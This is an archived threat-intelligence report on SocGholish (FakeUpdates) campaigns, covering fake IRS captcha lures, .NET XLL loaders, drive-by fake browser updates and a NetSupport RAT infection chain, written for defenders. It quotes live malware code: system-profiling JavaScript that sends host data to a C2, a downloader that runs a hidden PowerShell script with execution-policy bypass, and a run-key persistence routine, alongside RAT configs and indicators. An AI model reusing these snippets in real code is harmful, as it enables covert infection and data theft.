{
	"id": "aaad710b-1265-4f75-b74e-d4577e0095cb",
	"created_at": "2026-05-05T02:46:02.575779Z",
	"updated_at": "2026-05-05T02:46:37.060764Z",
	"deleted_at": null,
	"sha1_hash": "7f3c636dfdfb718e18edd4e1f9bdb824c4149f75",
	"title": "SocGholish Campaigns and Initial Access Kit",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1886145,
	"plain_text": "SocGholish Campaigns and Initial Access Kit\r\nBy Jason Reaves\r\nPublished: 2022-05-25 · Archived: 2026-05-05 02:03:02 UTC\r\n9 min read\r\nMay 25, 2022\r\nPress enter or click to view image in full size\r\nBy: Jason Reaves and Joshua Platt\r\nSocGholish AKA FAKEUPDATES was first reported in 2017. While the initial analysis and reporting did not gain\r\nmuch attention, over time the actor(s) behind the activity continued to expand and develop their operations.\r\nPartnering with Evil Corp, the FAKEUPDATE / SOCGHOLISH framework has become a major corporate initial\r\naccess vector. The threat actor(s) behind the framework have strong underground connections, demonstrated\r\nthrough their partnership with Evil Corp and signify thoroughly vetted cyber criminal activity. Threat attackers\r\nutilizing the framework represent significant risk to global corporations and have demonstrated top tier\r\npenetration testing abilities. According to the FBI, typical losses attributed to their activity span 1 to 40 million\r\ndollars per event[1].\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 1 of 16\n\nMost public reporting on SocGholish revolves around the usage of fake software updates either through drive-by\r\ndownloads or through links in email spam. However as we will demonstrate in this report they have the ability to\r\ndo specific campaigns throughout the year. We will link a previously unattributed campaign to this threat group by\r\nusing both our own private research and third-party public research. At the end, we will also demonstrate a way to\r\npivot on the SocGholish NetSupport RAT configs which can lead to other revelations including the discovery of a\r\npublicly available zip file linking one of our discovered RAT configs to a SocGholish campaign.\r\nIRS Campaigns\r\nWhile researching NetSupport RAT campaigns, we came across a campaign involving fake captchas,\r\ncompromised websites and a .NET based loader. The malware appeared to be an XLL loader[7] and appeared to\r\nbe primarily associated with NetSupport campaigns.\r\nPress enter or click to view image in full size\r\nWe were able to find one blog talking about these campaigns from Cofense[2] along with a IOC dump from a\r\nresearcher[9] but the details are lacking and there is no attribution mentioned. It did provide us some extra pivot\r\npoints thanks to their pictures of the campaigns. One pivot point in particular shows a usage of compromised\r\nwebsites:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 2 of 16\n\nThese sites just have an appended redirect location to the captcha site:\r\n# echo “bD1odHRwczovL2lyc2J1c2luZXNzYXVkaXQubmV0L2NhcHRjaGEucGhw” |base64 — decode\r\nl=hxxps://irsbusinessaudit[.]net/captcha.php\r\nWe can also pivot on this captcha website because they reuse the same code for the captcha gate:\r\nPress enter or click to view image in full size\r\nThe IP address for the hlmequipment domain at the time was 5.252.178[.]213 based on passive DNS data which\r\nshows similar usage of the XLL loader but also a LNK file:\r\nPress enter or click to view image in full size\r\nThe LNK file is a downloader that will be used to ultimately lead to NetSupport RAT as well:\r\nprocess call create “cmd /c start /min C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c I\r\nLNK files appear to be leveraged through VHD file spam. The associated VHD files were:\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 3 of 16\n\nfe2502a6432f272e6fcb7406182907cd54a94a958ee449be1528263a8caf0ac0\r\n4ca5c2c0cc2bd56626c3499a88bd5b4ce2bf053c37e50902722220279e2d26d5\r\nba757fa287f859745578b293896e4405b040dad3b393a7128966f15fa28dd7d8\r\nThese files also could have been hosted at compromised websites:\r\nPress enter or click to view image in full size\r\nThe files appear to contain the LNK files, which in the instance above will download ‘restore.dat’.his file is a\r\nscript based loader which will then load a .NET base64 encoded XLL loader onboard. In the example above it\r\nleads to this file:\r\nPress enter or click to view image in full size\r\nThese .NET based loaders contain a simplistic way that they obfuscate all their important strings:\r\nprivate static Random random = new Random();\r\nprivate static int dec2(int a, int varXLRDDAE) {\r\n return (a - varXLRDDAE) / varXLRDDAE;\r\n}\r\npublic static string RandomString(int length) {\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 4 of 16\n\nIEnumerable\u003cstring\u003e arg_291_0 = Enumerable.Repeat\u003cstring\u003e(Encoding.ASCII.GetString(new byte[] {\r\n (byte)IVOTSVZ.dec2(2178, 33),\r\n (byte)IVOTSVZ.dec2(2211, 33),\r\n (byte)IVOTSVZ.dec2(2244, 33),\r\n (byte)IVOTSVZ.dec2(2277, 33),\r\n (byte)IVOTSVZ.dec2(2310, 33),\r\n (byte)IVOTSVZ.dec2(2343, 33),\r\n (byte)IVOTSVZ.dec2(2376, 33),\r\nThe process remains the same across all the campaigns utilizing the loader that we have analyzed. Thanks to the\r\nstatic nature of .NET opcodes, we can automatically parse and decode the encoded data.\r\nDecoded strings:\r\nABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\r\nasdjvibisi4\r\ntaskhostw.exe\r\nhxxp://149.28.68[.]114/form_irs_check.png\r\nSoftware\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Runtaskhost\\\\\\\\client32.exe\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\r\nasdkjiufua\r\nOne of the XLL loaders also had a domain onboard instead of an IP.Along with communicating over HTTPS, this\r\nsample talked to irsbusinessaudit[.]net which was leveraged as part of the aforementioned captcha campaigns\r\nleading to NetSupport RAT:\r\nGatewayAddress=irsgetwell.net:443SecondaryGateway=asaicuuvuvyy33ifbcia33.cn:443\r\nGSK=GM\u003cAAFFI:M?ECKHP=IBLFP;I?OED:G\r\nThe Gateway address is specifically associated with SocGholish[8]:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 5 of 16\n\nFakeUpdate Drive-by Downloads\r\nDrive-by download campaigns normally consist of a website with injected javascript code:\r\nPress enter or click to view image in full size\r\nIn this case the injected code will end up going to:\r\nhxxps://design.lawrencetravelco[.]com/report?r=dj1iNjI0OWFiNTViODVhMDIxZmRjZCZjaWQ9MjYy\r\nThe sites are designed around social engineering involving browser updates, the browsers being targeted are the\r\nmain browsers used in the market; Chrome, Firefox, IE and Opera. As an example here is a fake Edge update:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 6 of 16\n\nThe structure of the downloaded zip file will be \u003cWords\u003e.[a-f0–9]{6}.zip and will unzip to a javascript file that\r\nwill begin checking in to a C2 and downloading more scripts that will profile the environment.\r\nPress enter or click to view image in full size\r\nThe script sends off a few hardcoded values, which are normally a letter and two numbers, and sets the variable\r\nurl2 as the C2 URL. The response from the C2 is then executed from the same context as this script. The next\r\nblock of code is called ‘init’ and is normally used to gather more data about the environment it is being executed\r\nin but can be seen accessing the ‘url2’ variable previously set:\r\nupperScope.b_request = request\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 7 of 16\n\nupperScope.reqUrl = url2\r\nSome WMI queries:\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_ComputerSystemProduct\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_OperatingSystem\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM AntiSpywareProduct\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM AntiVirusProduct\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_Process\", \"WQL\");\r\nvar colItems = objWMIService.ExecQuery(\"SELECT * FROM Win32_Service\", \"WQL\");\r\nThe script will end up gathering a lot of information which is sent off:\r\nvar userdnsdomain = wsh.ExpandEnvironmentStrings('%userdnsdomain%')\r\nvar username = wsh.ExpandEnvironmentStrings('%username%')\r\nvar computername = wsh.ExpandEnvironmentStrings('%computername%')\r\nvar processor_architecture = wsh.ExpandEnvironmentStrings('%processor_architecture%')\r\nvar whoami = executeCmdCommand('whoami /all')\r\nreq.push(['init_result', '1'])\r\nreq.push(['ConsentPromptBehaviorAdmin', ConsentPromptBehaviorAdmin])\r\nreq.push(['PromptOnSecureDesktop', PromptOnSecureDesktop])\r\nreq.push(['osBuildNumber', osBuildNumber])\r\nreq.push(['osCaption', osCaption])\r\nreq.push(['whoami', whoami])\r\nreq.push(['userdnsdomain', userdnsdomain])\r\nreq.push(['username', username])\r\nreq.push(['computername', computername])\r\nreq.push(['processor_architecture', processor_architecture])\r\nreq.push(['asproduct', ASProduct])\r\nreq.push(['processlist', processlist])\r\nreq.push(['servicelist', servicelist])\r\nthis['eval'](prepareRequest(req))\r\nThe delivery for this chain has previously been NetSupport RAT but lately a CobaltStrike loader that AV\r\ncompanies refer to as “Blister” Loader has been delivered, normally placed in a folder within ProgramData along\r\nwith a renamed Rundll32 executable. The name of the folder and file that will be used is hardcoded in one of the\r\nlayers responsible for decoding the CobaltStrike file, this way it can setup itself if needed.\r\nExample:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 8 of 16\n\nThe CobaltStrike malleable profile in use will leverage a new WerFault.exe process for itself, this activity blends\r\nin nicely with the DLLs as they contain many exports and during sandbox detonations will normally cause\r\nmultiple faults to occur legitimately.\r\nFakeUpdate Malspam\r\nThese campaigns have a similar flow to the above drive-by download chain except that links to compromised\r\nwebsites are spammed out.\r\nExample:\r\nhxxps://payyourintern[.]com/two-p-1-posts-in-the-un-for-young-specialists\r\nVisiting this site will lead to running some injected javascript code\r\n\u003cscript\u003e;(function(){var wq=document[id(\"cmVmZXJyZXI=\")]||'';var nb=new RegExp(id('Oi8vKFteL10rKS8='\r\nWhich will then lead to the same chain above, you might have noticed some static values that keep showing up:\r\ncmVmZXJyZXI=\r\nOi8vKFteL10rKS8=\r\nThanks to the service PublicWWW[6] we can use this data to check for other compromised sites:\r\nPress enter or click to view image in full size\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 9 of 16\n\nSocGholish Infection Package\r\nAll of the NetSupport RAT configs related to this threat group we have discovered have a static structure to the top\r\nportion of their config which means we can pivot on it to find more.\r\nbcd004db9f44f2414c7094f79afb2d80230611e5b4f97960685157d236186126\r\n[HTTP]\r\nGatewayAddress=mixerspring.cn:443SecondaryGateway=aasdig8g7b448ugudf.cn:443\r\nGSK=GM;NADEL9C\u003eIAPEF9K=OCHFL:C=IAP\r\n4fffa055d56e48fa0c469a54e2ebd857f23eca73a9928805b6a29a9483dffc21\r\n[HTTP]\r\nGatewayAddress=sjvuvja.com:443SecondaryGateway=nsncasicuasyca831cs3vvz.cn:443\r\nGSK=FK:O?HDE9C\u003eICGHM=FBKFL;E@NFA:I\r\nThis last config(4fff) is related to a NetSupport RAT package which has an interesting relation to another ZIP file:\r\nPress enter or click to view image in full size\r\nThe file names do resemble a SocGholish fakeupdate for Chrome browser campaign and infection so let’s analyze\r\nthem. First is the fakeupdate file which would be downloaded to the targets computer in a zip file.\r\nGet Jason Reaves’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 10 of 16\n\nFileName: Chrome.Update.50e772.js\r\nHash: 56de90d87bb9afc5345991b910a17cf0c6ee95cb97ea4b6de87fd93a8f22c9c0\r\n{‘URLS’: [‘https://10b33845.xen.hill-family.us/pixel.gif'], ‘C2’: [‘10b33845.xen.hill-family.us’]}\r\nFileName: stage_2.js\r\nHash: ee526c0f6ce5632e585b38322c2b6332730dfa9702d0d94c99dff7a36f98db1b\r\nThis file is the ‘init’ portion of SocGholish, it acts as an initial profiler for the infected system and sends off quite a\r\nlot of data along with some hardcoded values:\r\nvar req = [];\r\nreq.push('b');\r\nreq.push('503');\r\nreq.push(selfName);\r\nreq.push(ComputerName);\r\nreq.push(UserName);\r\nreq.push(Domain);\r\nreq.push(dnsDomain);\r\nreq.push(Manufacturer);\r\nreq.push(Model);\r\nreq.push(BIOS_Version);\r\nreq.push(AntiSpywareProduct);\r\nreq.push(AntiVirusProduct);\r\nreq.push(MACAddress);\r\nreq.push(ProcessList);\r\nthis['eval'](request(req));\r\nFileName: stage_3.js\r\nHash: 465ab5550bc788a274e38a71ecdc246d407c453a7a2d533a9b4aa2d9e53a8463\r\nThis is a downloader which is designed to download and execute a powershell script, the first thing it does is setup\r\nsome variables that will be leveraged:\r\nvar execFileName = '2b5fdce5.ps1';\r\nvar fs = new ActiveXObject(\"Scripting.FileSystemObject\");\r\nvar _tempFilePathExec = fs.GetSpecialFolder(2) + \"\\\\\" + execFileName;\r\nSubmits a request to download the file and writes it to the hardcoded name:\r\ntry {\r\n var req = [];\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 11 of 16\n\nreq.push('d');\r\n req.push('503');\r\n var fileContent = request(req);\r\n var stream = new ActiveXObject('ADODB.Stream');\r\n stream.Type = 2;\r\n stream.Charset = \"ISO-8859-1\";\r\n stream.Open();\r\n stream.WriteText(fileContent);\r\n stream.SaveToFile(_tempFilePathExec, 1);\r\n stream.Close();\r\n} catch (e) {\r\n initExeption = 'error number:' + e.number + ' message:' + e.message;\r\n}\r\nDetonates:\r\nif (initExeption == ‘0’) {\r\n try {\r\n var wsh = new ActiveXObject(“WScript.Shell”);\r\n runFileResult = wsh.Run(‘powershell -ep bypass -windowstyle hidden -f “‘ + _tempFilePathExec + ‘“\r\n } catch (e) {\r\n runFileExeption += ‘error number:’ + e.number + ‘ message:’ + e.message;\r\n }\r\n}\r\nSubmits completion and gets next stage which will be another script piece for the javascript backdoor portion:\r\nvar req = [];\r\nreq.push(‘c’);\r\nreq.push(‘503’);\r\nreq.push(_tempFilePathExec);\r\nreq.push(runFileResult);\r\nreq.push(initExeption);\r\nreq.push(runFileExeption);\r\nthis[‘eval’](request(req));\r\nFileName: stage_4.ps1\r\nHash: a1f710e70688c61f447d575a081f10f21c999170e67cdedff11acb6b87b0ba14\r\nThis is the downloaded and detonated powershell file from the previous stage, what is interesting is an overlap in\r\nobfuscation usage. The obfuscation wrapper here is related to ServHelper[4,5] which is utilized by TA505[4].\r\nDecoding is the exact same as would be done for a ServHelper related powershell file:\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 12 of 16\n\n\u003e\u003e\u003e passw = ‘n1db20gsmk536cazhrtuyx4fvol9q8pi’\r\n\u003e\u003e\u003e salt = ‘qxijovsr5w0a7zml9tpn2g3f8u6d1k4y’\r\n\u003e\u003e\u003e blob = find_blob(data)\r\n\u003e\u003e\u003e len(blob)\r\n5289900\r\n\u003e\u003e\u003e derbytes = MS_PasswordDeriveBytes(passw, salt, hashlib.sha1, iterations=2, keylen=16)\r\n\u003e\u003e\u003e c = DES3.new(derbytes, DES3.MODE_CBC, iv[:8])\r\n\u003e\u003e\u003e out = c.decrypt(b64decode(blob))\r\n\u003e\u003e\u003e out[:100]\r\n‘\\r\\n\\r\\n\\r\\nfunction oghygb4 {\\r\\n param($string, $method)\\r\\n $saguhga = [System.Text.Encoding]::as\r\n\u003e\u003e\u003e open(sys.argv[1]+’.decr’, ‘wb’).write(out)\r\nThe decoded file is then the stage_5 file from the original ZIP package. This file is responsible for XOR decoding\r\nthe NetSupport RAT package and also setting up the installation of it.\r\nCreates a random folder in AppData:\r\n$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count 8 | % {[char]$_}) )$\r\nSets the rat clientname and removes all ps1 files in temp for cleanup:\r\n$clientname=’ctfmon’+’.exe’remove-item $env:TEMP\\*.ps1\r\nWrites the zip file to appdata:\r\n$lit=”$fpath\\$randf”+”.zip”$gr = [System.Convert]::FromBase64String($nfuyrgg1)Set-Content -Path “$lit\r\nUnzips it and then cleans up the zip file:\r\ncd $fpathexpand-archive “$lit” “./”remove-item “$lit”\r\nRenames the rat client to ctfmon.exe\r\nrename-item “client32.exe” “$clientname”\r\nDecodes a registry key:\r\n$reg = oghygb4 “Jik2MF07PQ0TERAGHAcpKA4EHA0GCgETMjUcCwMIGREpJhIVHAcbETECHBEcCgk7PBcb” “z47gha”Decoded\r\nSets a run key and starts the process:\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 13 of 16\n\nnew-ItemProperty -Path “$reg” -Name “ctfmon_” -Value “$fpath\\$clientname”start-process “$fpath\\$clien\r\nFileName: DOo0gd4h.zip\r\nHash: 82ddf784507fffbbbcca749a687990345041c6c6cb5f4d768ee4136b3b4f4f03\r\nThis is the XOR decoded NetSupport RAT package, the client config:\r\n[HTTP]\r\nGatewayAddress=sjvuvja.com:443\r\nSecondaryGateway=nsncasicuasyca831cs3vvz.cn:443\r\nGSK=FK:O?HDE9C\u003eICGHM=FBKFL;E@NFA:I\r\nIOCs\r\nXLL loaders:\r\n9d8d289dd7fe149e89152983e40b2c1031e0dba3de9d89513163068bfb27a314\r\nccc0204486cbf8b6db43711ddf8d847cfc15d5f713c60b53c461c4e4eeeb1a4f\r\nabf625d2b1f5f0eb5149fa32ab6e81d148c7316ccb03da2b3db29c964a0cffe7\r\n8b7ece2a8678eef68c30332c283abcac6518732bf75eb19418516c18b361fafd\r\n617c331b65e0d26e1e64a04f06555891e719b578fd2bdc41065458176821f0c1\r\nNetSupport RAT Packages:\r\n61707f944c47121ba23f3889773aa7c858aa2aae174a145f0170ad7d0384d3bd\r\na79b86d06a64f3df1d503a5052a912de767eb1081b6b5192a1acfb9ce2c0a26e\r\n82ddf784507fffbbbcca749a687990345041c6c6cb5f4d768ee4136b3b4f4f03\r\nCampaign Files:\r\nfac07b49491d3639c0e8c800a71432b4ad1e4d827e9436b49fbbaefeadd853f9\r\nfe2502a6432f272e6fcb7406182907cd54a94a958ee449be1528263a8caf0ac0\r\n4ca5c2c0cc2bd56626c3499a88bd5b4ce2bf053c37e50902722220279e2d26d5\r\nba757fa287f859745578b293896e4405b040dad3b393a7128966f15fa28dd7d8\r\n584de2da31e64ccb44b618173344c5625288ba478d8b74cddd0b12ec7b689be4\r\nNetwork IOCs:\r\nirsbusinessaudit.net\r\nirsbusinessaudit.net/captcha.php\r\nsjvuvja.com\r\nhill-family.us\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 14 of 16\n\nmixerspring.cn\r\nnsncasicuasyca831cs3vvz.cn\r\naasdig8g7b448ugudf.cn\r\nirsgetwell.net\r\nasaicuuvuvyy33ifbcia33.cn\r\n149.28.68.114/form_irs_check.png\r\n45.77.87.77/form_irs_check.png\r\n5.252.178.213/restore.dat\r\n5.252.178.213/thumb_cdn.png\r\nhlmequipment.com\r\nbusinessaudit.tax/verification.php\r\nirsbusinessaudit.tax/f4742.php?e=info@tulsadiamond.com\r\nirsbusinessaudit.tax/f4742.php?e=tgentry@comfortmc.com\r\ncontentcdns.net\r\nasaasdivu73774vbaa33.cn\r\nsolenica.com/wp-content/themes/twentyfive/order.vhd\r\n45.76.172.113/fakeurl.htm\r\n194.180.158.173/fakeurl.htm\r\n87.120.8.141/fakeurl.htm\r\ndesign.lawrencetravelco.com\r\nRedirectors:\r\n.php?r=bD1odHR\r\n/report?r=dj1\r\nReferences\r\n1: https://docs.house.gov/meetings/JU/JU00/20220329/114533/HHRG-117-JU00-20220329-SD006.pdf\r\n2: https://cofense.com/blog/rat-campaign-looks-to-take-advantage-of-the-tax-season\r\n3: https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/\r\n4: https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505\r\n5: https://medium.com/walmartglobaltech/ta505-adds-golang-crypter-for-delivering-miners-and-servhelper-af70b26a6e56\r\n6: https://publicwww.com/\r\n7: https://www.bleepingcomputer.com/news/security/malicious-excel-xll-add-ins-push-redline-password-stealing-malware/\r\n8: https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 15 of 16\n\n9: https://github.com/executemalware/Malware-IOCs/blob/main/2022-02-17%20Netsupport%20IOCs\r\nSource: https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nhttps://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee"
	],
	"report_names": [
		"socgholish-campaigns-and-initial-access-kit-4c4283fea8ee"
	],
	"threat_actors": [],
	"ts_created_at": 1777949162,
	"ts_updated_at": 1777949197,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7f3c636dfdfb718e18edd4e1f9bdb824c4149f75.pdf",
		"text": "https://archive.orkl.eu/7f3c636dfdfb718e18edd4e1f9bdb824c4149f75.txt",
		"img": "https://archive.orkl.eu/7f3c636dfdfb718e18edd4e1f9bdb824c4149f75.jpg"
	}
}